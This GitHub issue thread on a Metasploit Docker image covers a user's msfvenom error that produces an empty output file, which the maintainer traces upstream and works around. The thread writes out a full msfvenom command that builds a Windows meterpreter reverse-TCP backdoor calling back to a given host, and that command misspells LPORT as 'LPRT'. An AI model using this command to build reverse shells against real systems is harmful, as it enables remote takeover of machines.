### ISSUE TITLE
Msfvenom "Error: Invalid option"

### ISSUE THREAD

**Issue by Fredus69** [phocean/dockerfile-debian-metasploit#1]
Hello,

I followed your instruction to build the container, and then i started the container with Metaspoit included.

When I wanted to create a meterpreter binary for Windows (i followed your article published in MISC HS 14) with the command below :
=> "msfvenom -p windows/meterpreter/reverse_tcp LPRT=9999 LHOST=192.168.0.145 -a x86 -f exe > /tmp/data/meterevil.exe"

it always says : "Error: Invalid option" But the binary is "built" Anyway.

If i install Metasploit in a Vbox VM and use the exactly same command, there is no error and the binary is built.

Do you have any idea why this error appears with the container ?
Did i make a mistake ?

Thanks you for your helps,

Best Regards

Fred

**Comment by Fredus69** [comment]
Evolution : After trying again, the meterpreter binary for Windows i made with "msfvenom" is not working. The file is 0 Ko, so the error Message "Error : Invalid Option" indicates that there is a real problem.

Is Anybody encounters the same issue ?

Thanks

Best Regards

**Comment by phocean** [comment]
Hello Fred,

Yes, same problem here. I will check if, as I suspect, the problem comes from upstream (because the docker is installing from their repos).

**Comment by Fredus69** [comment]
Hello,
Thanks, i appreciate your help.
Let me know if you need a new test, or additional informations

Fred

**Comment by phocean** [comment]
Ok, I found a potential cause, waiting from more info now and understanding how to fix it in the best way as possible:

https://github.com/rapid7/metasploit-framework/issues/8210

But so far, IMHO, it looks like an error on their side.

**Comment by phocean** [comment]
Meanwhile, just pushed a workaround, if you can test that everything is fine, that would be great.

(also updated on Docker Hub)

**Comment by Fredus69** [comment]
Hello,
It's ok now,  it works fine !
Thanks, i really appreciate,

Fred

**Comment by phocean** [comment]
You are welcome ;-)
